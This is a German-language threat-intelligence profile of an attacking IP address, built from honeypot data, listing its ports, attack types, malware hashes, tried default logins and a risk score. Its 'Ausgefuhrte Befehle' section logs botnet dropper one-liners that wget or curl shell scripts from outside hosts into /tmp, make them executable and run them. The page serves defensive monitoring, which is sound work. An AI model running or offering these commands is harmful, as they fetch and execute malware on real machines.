TROYANOSYVIRUS
Aktive BedrohungKRITISCH

64.89.161.198

Herkunftsland🇸🇬 Singapur
Erste Erkennung2.2.2026
Letzte Aktivitat23.2.2026
ISPOVH SAS
🎯
180
Gesamtangriffe
🔌
25
Ports
📡
7
Angriffsarten
🦠
5
Malware

Geolokalisierung

Land
🇸🇬 Singapur
Stadt
Unbekannt
ASN
AS16276
ISP
OVH SAS

Angriffsarten

h0neytr4p
cowrie
honeyaml
dionaea
tanner
honeytrap
ciscoasa

Angegriffene Ports

2380814431443300030013002300330043005300630073010312833014000400540634444+5

Zugehorige Malware

71db23fcf11f644479c6...c1c4ba9b177635033c28...db28e0588b7197dd095d...e3b0c44298fc1c149afb...e901d9ee2be164b109aa...

Versuchte Anmeldedaten

🔐admin/admin
11x
🔐root/root
6x

Ausgefuhrte Befehle

$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp; rm -f cat.sh; rm -rf iran.*; wget http://188.214.30.5/r.sh -O r.sh; chmod 777 r.sh; ./r.sh2x
$echo SUCCESS2x
$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.128.118.140/run.sh; curl -O http://45.128.118.140/run.sh; chmod 777 run.sh; sh run.sh; rm -rf run.sh1x
$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp; rm -f cat.sh; rm -rf iran.*; wget http://188.214.30.5/r.sh -O r.sh; chmod 777 r.sh; ./r.sh telnet1x

Risikobewertung

95
/100
NiedrigMittelHochKritisch